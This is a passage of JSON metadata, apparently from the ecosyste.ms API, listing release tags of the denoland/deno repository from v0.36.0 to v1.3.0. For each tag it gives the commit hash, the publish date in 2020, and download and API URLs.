v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id